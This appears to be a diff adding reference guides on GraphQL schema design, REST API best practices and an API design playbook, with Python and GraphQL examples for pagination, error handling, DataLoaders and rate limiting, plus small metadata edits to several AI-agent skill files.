      email
    }
    ... on Post {
      title
      content
    }
    ... on Comment {
      text
      author {
        name
      }
    }
  }
}
```

### 4. Input Types

```graphql
input CreateUserInput {
  email: String!
  name: String!
  password: String!
  profileInput: ProfileInput
}

input ProfileInput {
  bio: String
  avatar: String
  website: String
}

input UpdateUserInput {
  id: ID!
  email: String
  name: String
  profileInput: ProfileInput
}
```

## Pagination Patterns

### Relay Cursor Pagination (Recommended)

```graphql
type UserConnection {
  edges: [UserEdge!]!
  pageInfo: PageInfo!
  totalCount: Int!
}

type UserEdge {
  node: User!
  cursor: String!
}

type PageInfo {
  hasNextPage: Boolean!
  hasPreviousPage: Boolean!
  startCursor: String
  endCursor: String
}

type Query {
  users(first: Int, after: String, last: Int, before: String): UserConnection!
}

# Usage
{
  users(first: 10, after: "cursor123") {
    edges {
      cursor
      node {
        id
        name
      }
    }
    pageInfo {
      hasNextPage
      endCursor
    }
  }
}
```
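
Server-side, opaque cursors are often just base64-wrapped offsets or keys. A Python sketch of `first`/`after` slicing over an in-memory list (the `offset:` encoding is one common convention, not part of the Relay spec):

```python
import base64
from typing import Optional

def encode_cursor(offset: int) -> str:
    """Opaque cursor wrapping a row offset."""
    return base64.b64encode(f"offset:{offset}".encode()).decode()

def decode_cursor(cursor: str) -> int:
    return int(base64.b64decode(cursor).decode().split(":", 1)[1])

def paginate(rows, first: int, after: Optional[str] = None):
    """Return an edges/pageInfo block like the UserConnection type above."""
    start = decode_cursor(after) + 1 if after else 0
    window = rows[start:start + first]
    edges = [{"cursor": encode_cursor(start + i), "node": r}
             for i, r in enumerate(window)]
    return {
        "edges": edges,
        "pageInfo": {
            "hasNextPage": start + first < len(rows),
            "endCursor": edges[-1]["cursor"] if edges else None,
        },
    }
```

Clients then page forward by feeding `pageInfo.endCursor` back in as `after`, exactly as in the query above.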

### Offset Pagination (Simpler)

```graphql
type UserList {
  items: [User!]!
  total: Int!
  page: Int!
  pageSize: Int!
}

type Query {
  users(page: Int = 1, pageSize: Int = 20): UserList!
}
```

## Mutation Design Patterns

### 1. Input/Payload Pattern

```graphql
input CreatePostInput {
  title: String!
  content: String!
  tags: [String!]
}

type CreatePostPayload {
  post: Post
  errors: [Error!]
  success: Boolean!
}

type Error {
  field: String
  message: String!
  code: String!
}

type Mutation {
  createPost(input: CreatePostInput!): CreatePostPayload!
}
```

### 2. Optimistic Response Support

```graphql
type UpdateUserPayload {
  user: User
  clientMutationId: String
  errors: [Error!]
}

input UpdateUserInput {
  id: ID!
  name: String
  clientMutationId: String
}

type Mutation {
  updateUser(input: UpdateUserInput!): UpdateUserPayload!
}
```

### 3. Batch Mutations

```graphql
input BatchCreateUserInput {
  users: [CreateUserInput!]!
}

type BatchCreateUserPayload {
  results: [CreateUserResult!]!
  successCount: Int!
  errorCount: Int!
}

type CreateUserResult {
  user: User
  errors: [Error!]
  index: Int!
}

type Mutation {
  batchCreateUsers(input: BatchCreateUserInput!): BatchCreateUserPayload!
}
```
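
A batch resolver aggregates per-item outcomes into the payload shape above; each result keeps its `index` so clients can match failures back to their input. A sketch (the `create_one` callback is a hypothetical per-item creation function):

```python
def batch_create_users(inputs: list, create_one) -> dict:
    # create_one(user_input) -> (user_dict | None, errors_list)
    results = []
    for index, user_input in enumerate(inputs):
        user, errors = create_one(user_input)
        results.append({"user": user, "errors": errors, "index": index})
    success = sum(1 for r in results if r["user"] is not None)
    return {
        "results": results,
        "successCount": success,
        "errorCount": len(results) - success,
    }
```

Note that one bad item does not fail the whole batch; partial success is reported explicitly via the counts.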

## Field Design

### Arguments and Filtering

```graphql
type Query {
  posts(
    # Pagination
    first: Int = 20
    after: String

    # Filtering
    status: PostStatus
    authorId: ID
    tag: String

    # Sorting
    orderBy: PostOrderBy = CREATED_AT
    orderDirection: OrderDirection = DESC

    # Searching
    search: String
  ): PostConnection!
}

enum PostStatus {
  DRAFT
  PUBLISHED
  ARCHIVED
}

enum PostOrderBy {
  CREATED_AT
  UPDATED_AT
  TITLE
}

enum OrderDirection {
  ASC
  DESC
}
```

### Computed Fields

```graphql
type User {
  firstName: String!
  lastName: String!
  fullName: String!  # Computed in resolver
  posts: [Post!]!
  postCount: Int!    # Computed, doesn't load all posts
}

type Post {
  likeCount: Int!
  commentCount: Int!
  isLikedByViewer: Boolean!  # Context-dependent
}
```
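
Computed fields live entirely in resolvers; they read the parent object and derive a value on every request. A minimal sketch (the `postIds` field on the parent dict is an assumption for illustration):

```python
def resolve_full_name(user: dict, info=None) -> str:
    # Derived field: computed on read, never stored alongside the source columns.
    return f"{user['firstName']} {user['lastName']}"

def resolve_post_count(user: dict, info=None) -> int:
    # Sketch: count from an id list already on the parent object.
    # A real resolver would issue a COUNT(*) query rather than
    # loading post rows just to count them.
    return len(user.get("postIds", []))
```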

## Subscriptions

```graphql
type Subscription {
  postAdded: Post!

  postUpdated(postId: ID!): Post!

  userStatusChanged(userId: ID!): UserStatus!
}

type UserStatus {
  userId: ID!
  online: Boolean!
  lastSeen: DateTime!
}

# Client usage
subscription {
  postAdded {
    id
    title
    author {
      name
    }
  }
}
```

## Custom Scalars

```graphql
scalar DateTime
scalar Email
scalar URL
scalar JSON
scalar Money

type User {
  email: Email!
  website: URL
  createdAt: DateTime!
  metadata: JSON
}

type Product {
  price: Money!
}
```
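
Declaring a scalar in SDL is only half the work: the server must supply serialize/parse functions. A sketch for `DateTime` using ISO-8601 (framework wiring omitted; these are the plain functions you would register with your GraphQL library):

```python
from datetime import datetime, timezone

def serialize_datetime(value: datetime) -> str:
    # Outbound: always emit UTC ISO-8601 so clients see one canonical form.
    return value.astimezone(timezone.utc).isoformat()

def parse_datetime(value: str) -> datetime:
    # Inbound: reject anything that is not ISO-8601.
    try:
        return datetime.fromisoformat(value)
    except ValueError as exc:
        raise ValueError(f"DateTime must be ISO-8601, got {value!r}") from exc
```

The parse side is where custom scalars pay off: invalid values are rejected at the type layer before any resolver runs.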

## Directives

### Built-in Directives

```graphql
type User {
  name: String!
  email: String! @deprecated(reason: "Use emails field instead")
  emails: [String!]!

  # Conditionally requested by clients via @include / @skip in queries
  privateData: PrivateData
}

# Query
query GetUser($isOwner: Boolean!) {
  user(id: "123") {
    name
    privateData @include(if: $isOwner) {
      ssn
    }
  }
}
```

### Custom Directives

```graphql
directive @auth(requires: Role = USER) on FIELD_DEFINITION

enum Role {
  USER
  ADMIN
  MODERATOR
}

type Mutation {
  deleteUser(id: ID!): Boolean! @auth(requires: ADMIN)
  updateProfile(input: ProfileInput!): User! @auth
}
```

## Error Handling

### Union Error Pattern

```graphql
type User {
  id: ID!
  email: String!
}

type ValidationError {
  field: String!
  message: String!
}

type NotFoundError {
  message: String!
  resourceType: String!
  resourceId: ID!
}

type AuthorizationError {
  message: String!
}

union UserResult = User | ValidationError | NotFoundError | AuthorizationError

type Query {
  user(id: ID!): UserResult!
}

# Usage
{
  user(id: "123") {
    ... on User {
      id
      email
    }
    ... on NotFoundError {
      message
      resourceType
    }
    ... on AuthorizationError {
      message
    }
  }
}
```
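
The resolver for a union result returns one of the member shapes; tagging each with `__typename` is a common convention that lets the library's type resolver pick the right GraphQL type. A minimal sketch (the `db`/`viewer_can_read` parameters stand in for real data access and auth checks):

```python
def resolve_user(user_id: str, db: dict, viewer_can_read: bool) -> dict:
    # Each branch returns a dict tagged with __typename so the
    # union's type resolver can select the matching GraphQL type.
    if not viewer_can_read:
        return {"__typename": "AuthorizationError", "message": "Not allowed"}
    user = db.get(user_id)
    if user is None:
        return {
            "__typename": "NotFoundError",
            "message": "User not found",
            "resourceType": "User",
            "resourceId": user_id,
        }
    return {"__typename": "User", **user}
```

Because errors are schema types, clients handle them with typed fragments instead of parsing the top-level `errors` array.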

### Errors in Payload

```graphql
type CreateUserPayload {
  user: User
  errors: [Error!]
  success: Boolean!
}

type Error {
  field: String
  message: String!
  code: ErrorCode!
}

enum ErrorCode {
  VALIDATION_ERROR
  UNAUTHORIZED
  NOT_FOUND
  INTERNAL_ERROR
}
```

## N+1 Query Problem Solutions

### DataLoader Pattern

```python
from aiodataloader import DataLoader

class PostLoader(DataLoader):
    async def batch_load_fn(self, post_ids):
        posts = await db.posts.find({"id": {"$in": post_ids}})
        post_map = {post["id"]: post for post in posts}
        return [post_map.get(pid) for pid in post_ids]

# Resolver
@user_type.field("posts")
async def resolve_posts(user, info):
    loader = info.context["loaders"]["post"]
    return await loader.load_many(user["post_ids"])
```

### Query Depth Limiting

```python
from graphql import GraphQLError

def depth_limit_validator(max_depth: int):
    def validate(context, node, ancestors):
        depth = len(ancestors)
        if depth > max_depth:
            raise GraphQLError(
                f"Query depth {depth} exceeds maximum {max_depth}"
            )
    return validate
```

### Query Complexity Analysis

```python
from graphql import GraphQLError

def complexity_limit_validator(max_complexity: int):
    # is_list_field, get_list_size_arg, and walk_fields are placeholder
    # helpers; real implementations walk the query AST.
    def calculate_complexity(node):
        # Each field = 1, lists multiply by the requested page size
        complexity = 1
        if is_list_field(node):
            complexity *= get_list_size_arg(node)
        return complexity

    def validate_complexity(query_ast):
        total = sum(calculate_complexity(node) for node in walk_fields(query_ast))
        if total > max_complexity:
            raise GraphQLError(
                f"Query complexity {total} exceeds maximum {max_complexity}"
            )

    return validate_complexity
```

## Schema Versioning

### Field Deprecation

```graphql
type User {
  name: String! @deprecated(reason: "Use firstName and lastName")
  firstName: String!
  lastName: String!
}
```

### Schema Evolution

```graphql
# v1 - Initial
type User {
  name: String!
}

# v2 - Add optional field (backward compatible)
type User {
  name: String!
  email: String
}

# v3 - Deprecate and add new field
type User {
  name: String! @deprecated(reason: "Use firstName/lastName")
  firstName: String!
  lastName: String!
  email: String
}
```

## Best Practices Summary

1. **Nullable vs Non-Null**: Start nullable, make non-null when guaranteed
2. **Input Types**: Always use input types for mutations
3. **Payload Pattern**: Return errors in mutation payloads
4. **Pagination**: Use cursor-based for infinite scroll, offset for simple cases
5. **Naming**: Use camelCase for fields, PascalCase for types
6. **Deprecation**: Use `@deprecated` instead of removing fields
7. **DataLoaders**: Always use for relationships to prevent N+1
8. **Complexity Limits**: Protect against expensive queries
9. **Custom Scalars**: Use for domain-specific types (Email, DateTime)
10. **Documentation**: Document all fields with descriptions
@@ -0,0 +1,408 @@
# REST API Best Practices

## URL Structure

### Resource Naming

```
# Good - Plural nouns
GET /api/users
GET /api/orders
GET /api/products

# Bad - Verbs or mixed conventions
GET /api/getUser
GET /api/user (inconsistent singular)
POST /api/createOrder
```

### Nested Resources

```
# Shallow nesting (preferred)
GET /api/users/{id}/orders
GET /api/orders/{id}

# Deep nesting (avoid)
GET /api/users/{id}/orders/{orderId}/items/{itemId}/reviews
# Better:
GET /api/order-items/{id}/reviews
```

## HTTP Methods and Status Codes

### GET - Retrieve Resources

```
GET /api/users          → 200 OK (with list)
GET /api/users/{id}     → 200 OK or 404 Not Found
GET /api/users?page=2   → 200 OK (paginated)
```

### POST - Create Resources

```
POST /api/users
Body: {"name": "John", "email": "john@example.com"}
→ 201 Created
Location: /api/users/123
Body: {"id": "123", "name": "John", ...}

POST /api/users (validation error)
→ 422 Unprocessable Entity
Body: {"errors": [...]}
```

### PUT - Replace Resources

```
PUT /api/users/{id}
Body: {complete user object}
→ 200 OK (updated)
→ 404 Not Found (doesn't exist)

# Must include ALL fields
```

### PATCH - Partial Update

```
PATCH /api/users/{id}
Body: {"name": "Jane"} (only changed fields)
→ 200 OK
→ 404 Not Found
```

### DELETE - Remove Resources

```
DELETE /api/users/{id}
→ 204 No Content (deleted)
→ 404 Not Found
→ 409 Conflict (can't delete due to references)
```

## Filtering, Sorting, and Searching

### Query Parameters

```
# Filtering
GET /api/users?status=active
GET /api/users?role=admin&status=active

# Sorting
GET /api/users?sort=created_at
GET /api/users?sort=-created_at (descending)
GET /api/users?sort=name,created_at

# Searching
GET /api/users?search=john
GET /api/users?q=john

# Field selection (sparse fieldsets)
GET /api/users?fields=id,name,email
```
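
The `-field` sort convention is easy to parse on the server. A sketch of turning the query parameter into ordered (field, direction) clauses:

```python
def parse_sort(sort_param: str) -> list:
    # "-created_at,name" -> [("created_at", "desc"), ("name", "asc")]
    clauses = []
    for field in sort_param.split(","):
        field = field.strip()
        if field.startswith("-"):
            clauses.append((field[1:], "desc"))
        elif field:
            clauses.append((field, "asc"))
    return clauses
```

In practice you would also validate each field against an allow-list before passing it to the database, to prevent sorting on arbitrary columns.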

## Pagination Patterns

### Offset-Based Pagination

```
GET /api/users?page=2&page_size=20

Response:
{
  "items": [...],
  "page": 2,
  "page_size": 20,
  "total": 150,
  "pages": 8
}
```

### Cursor-Based Pagination (for large datasets)

```
GET /api/users?limit=20&cursor=eyJpZCI6MTIzfQ

Response:
{
  "items": [...],
  "next_cursor": "eyJpZCI6MTQzfQ",
  "has_more": true
}
```

### Link Header Pagination (RESTful)

```
GET /api/users?page=2

Response Headers:
Link: <https://api.example.com/users?page=3>; rel="next",
      <https://api.example.com/users?page=1>; rel="prev",
      <https://api.example.com/users?page=1>; rel="first",
      <https://api.example.com/users?page=8>; rel="last"
```
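
Building that header is straightforward string assembly following the RFC 8288 `<url>; rel="..."` form. A sketch:

```python
def build_link_header(base_url: str, page: int, pages: int) -> str:
    # One <url>; rel="..." pair per relation, comma-separated (RFC 8288).
    links = {"first": 1, "last": pages}
    if page < pages:
        links["next"] = page + 1
    if page > 1:
        links["prev"] = page - 1
    return ", ".join(
        f'<{base_url}?page={p}>; rel="{rel}"' for rel, p in links.items()
    )
```

Note `next` and `prev` are omitted at the boundaries rather than pointing past the collection.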

## Versioning Strategies

### URL Versioning (Recommended)

```
/api/v1/users
/api/v2/users

Pros: Clear, easy to route
Cons: Multiple URLs for same resource
```

### Header Versioning

```
GET /api/users
Accept: application/vnd.api+json; version=2

Pros: Clean URLs
Cons: Less visible, harder to test
```

### Query Parameter

```
GET /api/users?version=2

Pros: Easy to test
Cons: Optional parameter can be forgotten
```

## Rate Limiting

### Headers

```
X-RateLimit-Limit: 1000
X-RateLimit-Remaining: 742
X-RateLimit-Reset: 1640000000

Response when limited:
429 Too Many Requests
Retry-After: 3600
```

### Implementation Pattern

```python
from datetime import datetime, timedelta

from fastapi import FastAPI, HTTPException, Request

app = FastAPI()

class RateLimiter:
    def __init__(self, calls: int, period: int):
        self.calls = calls
        self.period = period
        self.cache = {}

    def check(self, key: str) -> bool:
        now = datetime.now()
        if key not in self.cache:
            self.cache[key] = []

        # Remove old requests
        self.cache[key] = [
            ts for ts in self.cache[key]
            if now - ts < timedelta(seconds=self.period)
        ]

        if len(self.cache[key]) >= self.calls:
            return False

        self.cache[key].append(now)
        return True

limiter = RateLimiter(calls=100, period=60)

@app.get("/api/users")
async def get_users(request: Request):
    if not limiter.check(request.client.host):
        raise HTTPException(
            status_code=429,
            headers={"Retry-After": "60"}
        )
    return {"users": [...]}
```

## Authentication and Authorization

### Bearer Token

```
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...

401 Unauthorized - Missing/invalid token
403 Forbidden - Valid token, insufficient permissions
```

### API Keys

```
X-API-Key: your-api-key-here
```

## Error Response Format

### Consistent Structure

```json
{
  "error": {
    "code": "VALIDATION_ERROR",
    "message": "Request validation failed",
    "details": [
      {
        "field": "email",
        "message": "Invalid email format",
        "value": "not-an-email"
      }
    ],
    "timestamp": "2025-10-16T12:00:00Z",
    "path": "/api/users"
  }
}
```

### Status Code Guidelines

- `200 OK`: Successful GET, PATCH, PUT
- `201 Created`: Successful POST
- `204 No Content`: Successful DELETE
- `400 Bad Request`: Malformed request
- `401 Unauthorized`: Authentication required
- `403 Forbidden`: Authenticated but not authorized
- `404 Not Found`: Resource doesn't exist
- `409 Conflict`: State conflict (duplicate email, etc.)
- `422 Unprocessable Entity`: Validation errors
- `429 Too Many Requests`: Rate limited
- `500 Internal Server Error`: Server error
- `503 Service Unavailable`: Temporary downtime

## Caching

### Cache Headers

```
# Client caching
Cache-Control: public, max-age=3600

# No caching
Cache-Control: no-cache, no-store, must-revalidate

# Conditional requests
ETag: "33a64df551425fcc55e4d42a148795d9f25f89d4"
If-None-Match: "33a64df551425fcc55e4d42a148795d9f25f89d4"
→ 304 Not Modified
```
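
The conditional-request flow reduces to: hash the response body into an ETag, compare it with the client's `If-None-Match`, and skip the body on a match. A framework-agnostic sketch:

```python
import hashlib
from typing import Optional, Tuple

def make_etag(body: bytes) -> str:
    # Strong ETag derived from the response body (quoted per the HTTP spec).
    return '"' + hashlib.sha1(body).hexdigest() + '"'

def conditional_response(body: bytes, if_none_match: Optional[str]) -> Tuple[int, bytes]:
    etag = make_etag(body)
    if if_none_match == etag:
        return 304, b""  # client copy is fresh; send no body
    return 200, body
```

A real handler would also echo the `ETag` header on both the 200 and the 304 response.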

## Bulk Operations

### Batch Endpoints

```
POST /api/users/batch
{
  "items": [
    {"name": "User1", "email": "user1@example.com"},
    {"name": "User2", "email": "user2@example.com"}
  ]
}

Response:
{
  "results": [
    {"id": "1", "status": "created"},
    {"id": null, "status": "failed", "error": "Email already exists"}
  ]
}
```

## Idempotency

### Idempotency Keys

```
POST /api/orders
Idempotency-Key: unique-key-123

If duplicate request:
→ 200 OK (return cached response)
```
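
Server-side, an idempotency key maps to a cached response: the first request executes and stores its result, retries with the same key replay it without re-executing. A minimal in-memory sketch (production would use a shared store such as Redis with a TTL):

```python
class IdempotencyStore:
    def __init__(self):
        self._responses = {}

    def handle(self, key: str, create_order):
        # Returns (replayed, response): the same key always yields
        # the same cached response; create_order runs at most once per key.
        if key in self._responses:
            return True, self._responses[key]
        response = create_order()
        self._responses[key] = response
        return False, response
```

This is what makes client retries of a POST safe: a network timeout after the first attempt cannot create a duplicate order.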

## CORS Configuration

```python
from fastapi.middleware.cors import CORSMiddleware

app.add_middleware(
    CORSMiddleware,
    allow_origins=["https://example.com"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
```

## Documentation with OpenAPI

```python
from fastapi import FastAPI, Path

app = FastAPI(
    title="My API",
    description="API for managing users",
    version="1.0.0",
    docs_url="/docs",
    redoc_url="/redoc"
)

@app.get(
    "/api/users/{user_id}",
    summary="Get user by ID",
    response_description="User details",
    tags=["Users"]
)
async def get_user(
    user_id: str = Path(..., description="The user ID")
):
    """
    Retrieve user by ID.

    Returns full user profile including:
    - Basic information
    - Contact details
    - Account status
    """
    pass
```

## Health and Monitoring Endpoints

```python
from datetime import datetime

@app.get("/health")
async def health_check():
    return {
        "status": "healthy",
        "version": "1.0.0",
        "timestamp": datetime.now().isoformat()
    }

@app.get("/health/detailed")
async def detailed_health():
    return {
        "status": "healthy",
        "checks": {
            "database": await check_database(),
            "redis": await check_redis(),
            "external_api": await check_external_api()
        }
    }
```
@@ -0,0 +1,513 @@
# API Design Principles Implementation Playbook

This file contains detailed patterns, checklists, and code samples referenced by the skill.

## Core Concepts

### 1. RESTful Design Principles

**Resource-Oriented Architecture**

- Resources are nouns (users, orders, products), not verbs
- Use HTTP methods for actions (GET, POST, PUT, PATCH, DELETE)
- URLs represent resource hierarchies
- Consistent naming conventions

**HTTP Methods Semantics:**

- `GET`: Retrieve resources (idempotent, safe)
- `POST`: Create new resources
- `PUT`: Replace entire resource (idempotent)
- `PATCH`: Partial resource updates
- `DELETE`: Remove resources (idempotent)

### 2. GraphQL Design Principles

**Schema-First Development**

- Types define your domain model
- Queries for reading data
- Mutations for modifying data
- Subscriptions for real-time updates

**Query Structure:**

- Clients request exactly what they need
- Single endpoint, multiple operations
- Strongly typed schema
- Introspection built-in

### 3. API Versioning Strategies

**URL Versioning:**

```
/api/v1/users
/api/v2/users
```

**Header Versioning:**

```
Accept: application/vnd.api+json; version=1
```

**Query Parameter Versioning:**

```
/api/users?version=1
```

## REST API Design Patterns

### Pattern 1: Resource Collection Design

```
# Good: Resource-oriented endpoints
GET    /api/users          # List users (with pagination)
POST   /api/users          # Create user
GET    /api/users/{id}     # Get specific user
PUT    /api/users/{id}     # Replace user
PATCH  /api/users/{id}     # Update user fields
DELETE /api/users/{id}     # Delete user

# Nested resources
GET  /api/users/{id}/orders   # Get user's orders
POST /api/users/{id}/orders   # Create order for user

# Bad: Action-oriented endpoints (avoid)
POST /api/createUser
POST /api/getUserById
POST /api/deleteUser
```

### Pattern 2: Pagination and Filtering

```python
from typing import List, Optional
from pydantic import BaseModel, Field

class PaginationParams(BaseModel):
    page: int = Field(1, ge=1, description="Page number")
    page_size: int = Field(20, ge=1, le=100, description="Items per page")

class FilterParams(BaseModel):
    status: Optional[str] = None
    created_after: Optional[str] = None
    search: Optional[str] = None

class PaginatedResponse(BaseModel):
    items: List[dict]
    total: int
    page: int
    page_size: int
    pages: int

    @property
    def has_next(self) -> bool:
        return self.page < self.pages

    @property
    def has_prev(self) -> bool:
        return self.page > 1

# FastAPI endpoint example
from fastapi import FastAPI, Query, Depends

app = FastAPI()

@app.get("/api/users", response_model=PaginatedResponse)
async def list_users(
    page: int = Query(1, ge=1),
    page_size: int = Query(20, ge=1, le=100),
    status: Optional[str] = Query(None),
    search: Optional[str] = Query(None)
):
    # Apply filters
    query = build_query(status=status, search=search)

    # Count total
    total = await count_users(query)

    # Fetch page
    offset = (page - 1) * page_size
    users = await fetch_users(query, limit=page_size, offset=offset)

    return PaginatedResponse(
        items=users,
        total=total,
        page=page,
        page_size=page_size,
        pages=(total + page_size - 1) // page_size
    )
```

### Pattern 3: Error Handling and Status Codes

```python
from typing import Any, List, Optional

from fastapi import HTTPException, status
from pydantic import BaseModel

class ErrorResponse(BaseModel):
    error: str
    message: str
    details: Optional[dict] = None
    timestamp: str
    path: str

class ValidationErrorDetail(BaseModel):
    field: str
    message: str
    value: Any

# Consistent error responses
STATUS_CODES = {
    "success": 200,
    "created": 201,
    "no_content": 204,
    "bad_request": 400,
    "unauthorized": 401,
    "forbidden": 403,
    "not_found": 404,
    "conflict": 409,
    "unprocessable": 422,
    "internal_error": 500
}

def raise_not_found(resource: str, id: str):
    raise HTTPException(
        status_code=status.HTTP_404_NOT_FOUND,
        detail={
            "error": "NotFound",
            "message": f"{resource} not found",
            "details": {"id": id}
        }
    )

def raise_validation_error(errors: List[ValidationErrorDetail]):
    raise HTTPException(
        status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,
        detail={
            "error": "ValidationError",
            "message": "Request validation failed",
            "details": {"errors": [e.dict() for e in errors]}
        }
    )

# Example usage
@app.get("/api/users/{user_id}")
async def get_user(user_id: str):
    user = await fetch_user(user_id)
    if not user:
        raise_not_found("User", user_id)
    return user
```

### Pattern 4: HATEOAS (Hypermedia as the Engine of Application State)

```python
class UserResponse(BaseModel):
    id: str
    name: str
    email: str
    # Leading-underscore names are treated as private by Pydantic,
    # so expose the hypermedia links via an alias instead.
    links: dict = Field(alias="_links")

    @classmethod
    def from_user(cls, user: User, base_url: str):
        return cls(
            id=user.id,
            name=user.name,
            email=user.email,
            _links={
                "self": {"href": f"{base_url}/api/users/{user.id}"},
                "orders": {"href": f"{base_url}/api/users/{user.id}/orders"},
                "update": {
                    "href": f"{base_url}/api/users/{user.id}",
                    "method": "PATCH"
                },
                "delete": {
                    "href": f"{base_url}/api/users/{user.id}",
                    "method": "DELETE"
                }
            }
        )
```

## GraphQL Design Patterns

### Pattern 1: Schema Design

```graphql
# schema.graphql

# Clear type definitions
type User {
  id: ID!
  email: String!
  name: String!
  createdAt: DateTime!

  # Relationships
  orders(first: Int = 20, after: String, status: OrderStatus): OrderConnection!

  profile: UserProfile
}

type Order {
  id: ID!
  status: OrderStatus!
  total: Money!
  items: [OrderItem!]!
  createdAt: DateTime!

  # Back-reference
  user: User!
}

# Pagination pattern (Relay-style)
type OrderConnection {
  edges: [OrderEdge!]!
  pageInfo: PageInfo!
  totalCount: Int!
}

type OrderEdge {
  node: Order!
  cursor: String!
}

type PageInfo {
  hasNextPage: Boolean!
  hasPreviousPage: Boolean!
  startCursor: String
  endCursor: String
}

# Enums for type safety
enum OrderStatus {
  PENDING
  CONFIRMED
  SHIPPED
  DELIVERED
  CANCELLED
}

# Custom scalars
scalar DateTime
scalar Money

# Query root
type Query {
  user(id: ID!): User
  users(first: Int = 20, after: String, search: String): UserConnection!

  order(id: ID!): Order
}

# Mutation root
type Mutation {
  createUser(input: CreateUserInput!): CreateUserPayload!
  updateUser(input: UpdateUserInput!): UpdateUserPayload!
  deleteUser(id: ID!): DeleteUserPayload!

  createOrder(input: CreateOrderInput!): CreateOrderPayload!
}

# Input types for mutations
input CreateUserInput {
  email: String!
  name: String!
  password: String!
}

# Payload types for mutations
type CreateUserPayload {
  user: User
  errors: [Error!]
}

type Error {
  field: String
  message: String!
}
```

### Pattern 2: Resolver Design

```python
from typing import Optional

from ariadne import QueryType, MutationType, ObjectType

query = QueryType()
mutation = MutationType()
user_type = ObjectType("User")

@query.field("user")
async def resolve_user(obj, info, id: str) -> Optional[dict]:
    """Resolve single user by ID."""
    return await fetch_user_by_id(id)

@query.field("users")
async def resolve_users(
    obj,
    info,
    first: int = 20,
    after: Optional[str] = None,
    search: Optional[str] = None
) -> dict:
    """Resolve paginated user list."""
    # Decode cursor
    offset = decode_cursor(after) if after else 0

    # Fetch users
    users = await fetch_users(
        limit=first + 1,  # Fetch one extra to check hasNextPage
        offset=offset,
        search=search
    )

    # Pagination
    has_next = len(users) > first
    if has_next:
        users = users[:first]

    edges = [
        {
            "node": user,
            "cursor": encode_cursor(offset + i)
        }
        for i, user in enumerate(users)
    ]

    return {
        "edges": edges,
        "pageInfo": {
            "hasNextPage": has_next,
            "hasPreviousPage": offset > 0,
            "startCursor": edges[0]["cursor"] if edges else None,
            "endCursor": edges[-1]["cursor"] if edges else None
        },
        "totalCount": await count_users(search=search)
    }

@user_type.field("orders")
async def resolve_user_orders(user: dict, info, first: int = 20) -> dict:
    """Resolve user's orders (N+1 prevention with DataLoader)."""
    # Use DataLoader to batch requests
    loader = info.context["loaders"]["orders_by_user"]
    orders = await loader.load(user["id"])

    return paginate_orders(orders, first)

@mutation.field("createUser")
async def resolve_create_user(obj, info, input: dict) -> dict:
    """Create new user."""
    try:
        # Validate input
        validate_user_input(input)

        # Create user
        user = await create_user(
            email=input["email"],
            name=input["name"],
            password=hash_password(input["password"])
        )

        return {
            "user": user,
            "errors": []
        }
    except ValidationError as e:
        return {
            "user": None,
            "errors": [{"field": e.field, "message": e.message}]
        }
```

### Pattern 3: DataLoader (N+1 Problem Prevention)

```python
from typing import List, Optional

from aiodataloader import DataLoader

class UserLoader(DataLoader):
    """Batch load users by ID."""

    async def batch_load_fn(self, user_ids: List[str]) -> List[Optional[dict]]:
        """Load multiple users in single query."""
        users = await fetch_users_by_ids(user_ids)

        # Map results back to input order
        user_map = {user["id"]: user for user in users}
        return [user_map.get(user_id) for user_id in user_ids]

class OrdersByUserLoader(DataLoader):
    """Batch load orders by user ID."""

    async def batch_load_fn(self, user_ids: List[str]) -> List[List[dict]]:
        """Load orders for multiple users in single query."""
        orders = await fetch_orders_by_user_ids(user_ids)

        # Group orders by user_id
        orders_by_user = {}
        for order in orders:
            user_id = order["user_id"]
            if user_id not in orders_by_user:
                orders_by_user[user_id] = []
            orders_by_user[user_id].append(order)

        # Return in input order
        return [orders_by_user.get(user_id, []) for user_id in user_ids]

# Context setup
def create_context():
    return {
        "loaders": {
            "user": UserLoader(),
            "orders_by_user": OrdersByUserLoader()
        }
    }
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### REST APIs
|
||||
|
||||
1. **Consistent Naming**: Use plural nouns for collections (`/users`, not `/user`)
|
||||
2. **Stateless**: Each request contains all necessary information
|
||||
3. **Use HTTP Status Codes Correctly**: 2xx success, 4xx client errors, 5xx server errors
|
||||
4. **Version Your API**: Plan for breaking changes from day one
|
||||
5. **Pagination**: Always paginate large collections
|
||||
6. **Rate Limiting**: Protect your API with rate limits
|
||||
7. **Documentation**: Use OpenAPI/Swagger for interactive docs
|
||||
|
||||
### GraphQL APIs

1. **Schema First**: Design schema before writing resolvers
2. **Avoid N+1**: Use DataLoaders for efficient data fetching
3. **Input Validation**: Validate at schema and resolver levels
4. **Error Handling**: Return structured errors in mutation payloads
5. **Pagination**: Use cursor-based pagination (Relay spec)
6. **Deprecation**: Use `@deprecated` directive for gradual migration
7. **Monitoring**: Track query complexity and execution time

## Common Pitfalls

- **Over-fetching/Under-fetching (REST)**: Fixed in GraphQL but requires DataLoaders
- **Breaking Changes**: Version APIs or use deprecation strategies
- **Inconsistent Error Formats**: Standardize error responses
- **Missing Rate Limits**: APIs without limits are vulnerable to abuse
- **Poor Documentation**: Undocumented APIs frustrate developers
- **Ignoring HTTP Semantics**: POST for idempotent operations breaks expectations
- **Tight Coupling**: API structure shouldn't mirror database schema

## Resources

- **references/rest-best-practices.md**: Comprehensive REST API design guide
- **references/graphql-schema-design.md**: GraphQL schema patterns and anti-patterns
- **references/api-versioning-strategies.md**: Versioning approaches and migration paths
- **assets/rest-api-template.py**: FastAPI REST API template
- **assets/graphql-schema-template.graphql**: Complete GraphQL schema example
- **assets/api-design-checklist.md**: Pre-implementation review checklist
- **scripts/openapi-generator.py**: Generate OpenAPI specs from code

@@ -3,6 +3,7 @@ name: api-documentation-generator
description: "Generate comprehensive, developer-friendly API documentation from code, including endpoints, parameters, examples, and best practices"
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Documentation Generator

@@ -1,11 +1,10 @@
---
name: api-documentation
description: "API documentation workflow for generating OpenAPI specs, creating developer guides, and maintaining comprehensive API documentation."
source: personal
risk: safe
domain: documentation
category: granular-workflow-bundle
version: 1.0.0
risk: safe
source: personal
date_added: "2026-02-27"
---

# API Documentation Workflow

@@ -1,14 +1,9 @@
---
name: api-documenter
description: |
  Master API documentation with OpenAPI 3.1, AI-powered tools, and
  modern developer experience practices. Create interactive docs, generate SDKs,
  and build comprehensive developer portals. Use PROACTIVELY for API
  documentation or developer portal creation.
metadata:
  model: sonnet
